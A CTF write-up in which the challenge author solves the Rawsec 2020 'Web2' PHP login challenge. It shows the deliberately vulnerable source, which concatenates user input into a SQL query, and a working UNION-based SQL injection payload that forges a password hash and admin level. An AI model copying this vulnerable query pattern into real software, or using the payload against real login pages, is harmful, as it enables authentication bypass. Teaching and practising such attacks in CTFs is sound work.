Rawsec 2020 - Web2 Challenge Write-Up
Disclaimer: I'm the challenge author
As this challenge provide source code, we will just look into the source code.
In the source.zip contain 3 files.
- db.sql
- index.php
- style.css
The login mechanism:
if(!empty($_POST['username'])) {
$q = $mysqli->query("SELECT * FROM logins WHERE username = '" . $_POST['username'] . "'");
if($q->num_rows > 0) {
// username exists
$data = $q->fetch_object();
if( password_verify($_POST['password'], $data->userpass) ) {
// valid password
if($data->userlevel >= 999) {
$flag = include("flag.php");
echo "<script>alert('Flag: ".$flag."');</script>";
} else {
echo "<script>alert('Insufficient user level :)');</script>";
}
} else {
echo "<script>alert('Invalid username or password.');</script>";
}
} else {
echo "<script>alert('Invalid username or password');</script>";
}
}In order to use UNION technique, you required to have same column number as original (first) query. at line number 9 index.php shown SELECT * query, mean that selecting all available column in the table.
$q = $mysqli->query("SELECT * FROM logins WHERE username = '" . $_POST['username'] . "'");We refer to the db.sql, at CREATE TABLE statement, it has 5 columns.
CREATE TABLE `logins` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`username` varchar(255) NOT NULL,
`userpass` varchar(255) NOT NULL,
`userlevel` varchar(1) NOT NULL,
`created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;Now we have all the information we need to do UNION technique.
To generate hash that satisfy password_verify, please use following commands:
php -r "echo password_hash('yourpassword', PASSWORD_DEFAULT);"After generate the hash.
Our injection would be:
a' and 1=2 union select 1,2,'our generated hash',9999,3 -- aThats all,
ciao
Full content of db.sql and index.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64) | |
| -- | |
| -- Host: localhost Database: webctf | |
| -- ------------------------------------------------------ | |
| -- Server version 5.7.29-0ubuntu0.18.04.1 | |
| /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */; | |
| /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */; | |
| /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */; | |
| /*!40101 SET NAMES utf8 */; | |
| /*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */; | |
| /*!40103 SET TIME_ZONE='+00:00' */; | |
| /*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */; | |
| /*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */; | |
| /*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */; | |
| /*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */; | |
| -- | |
| -- Table structure for table `logins` | |
| -- | |
| DROP TABLE IF EXISTS `logins`; | |
| /*!40101 SET @saved_cs_client = @@character_set_client */; | |
| /*!40101 SET character_set_client = utf8 */; | |
| CREATE TABLE `logins` ( | |
| `id` int(11) NOT NULL AUTO_INCREMENT, | |
| `username` varchar(255) NOT NULL, | |
| `userpass` varchar(255) NOT NULL, | |
| `userlevel` varchar(1) NOT NULL, | |
| `created_at` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP, | |
| PRIMARY KEY (`id`) | |
| ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; | |
| /*!40101 SET character_set_client = @saved_cs_client */; | |
| -- | |
| -- Dumping data for table `logins` | |
| -- | |
| LOCK TABLES `logins` WRITE; | |
| /*!40000 ALTER TABLE `logins` DISABLE KEYS */; | |
| INSERT INTO `logins` VALUES (1,'admin','$P$NOTAVALIDHASHOBVIOUSLY.','1','2020-02-19 12:33:40'); | |
| /*!40000 ALTER TABLE `logins` ENABLE KEYS */; | |
| UNLOCK TABLES; | |
| /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; | |
| /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; | |
| /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; | |
| /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; | |
| /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; | |
| /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; | |
| /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; | |
| /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; | |
| -- Dump completed on 2020-02-19 12:34:07 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $mysqli = new mysqli('localhost', 'root', 'password', 'webctf'); | |
| if ($mysqli->connect_error) { | |
| die('Connect Error (' . $mysqli->connect_errno . ') ' | |
| . $mysqli->connect_error); | |
| } | |
| if(!empty($_POST['username'])) { | |
| $q = $mysqli->query("SELECT * FROM logins WHERE username = '" . $_POST['username'] . "'"); | |
| if($q->num_rows > 0) { | |
| // username exists | |
| $data = $q->fetch_object(); | |
| if( password_verify($_POST['password'], $data->userpass) ) { | |
| // valid password | |
| if($data->userlevel >= 999) { | |
| $flag = include("flag.php"); | |
| echo "<script>alert('Flag: ".$flag."');</script>"; | |
| } else { | |
| echo "<script>alert('Insufficient user level :)');</script>"; | |
| } | |
| } else { | |
| echo "<script>alert('Invalid username or password.');</script>"; | |
| } | |
| } else { | |
| echo "<script>alert('Invalid username or password');</script>"; | |
| } | |
| } | |
| ?> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> | |
| <meta name="description" content="RawSEC CTF"> | |
| <meta name="author" content="rempah <3"> | |
| <title>RawSEC CTF</title> | |
| <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"> | |
| <link rel="stylesheet" href="/style.css"> | |
| <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script> | |
| <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> | |
| </head> | |
| <body> | |
| <div class="login"> | |
| <form class="login-form" action="" method="post"> | |
| <h2 class="text-center">Log in</h2> | |
| <div class="form-group"> | |
| <input type="text" class="form-control" placeholder="Username" name="username" required="required"> | |
| </div> | |
| <div class="form-group"> | |
| <input type="password" class="form-control" placeholder="Password" name="password" required="required"> | |
| </div> | |
| <div class="form-group"> | |
| <button type="submit" class="btn btn-primary btn-block">Log in</button> | |
| </div> | |
| </form> | |
| </div> | |
| </body> | |
| </html> |
Subscribe to:
Posts
(
Atom
)
No comments :
Post a Comment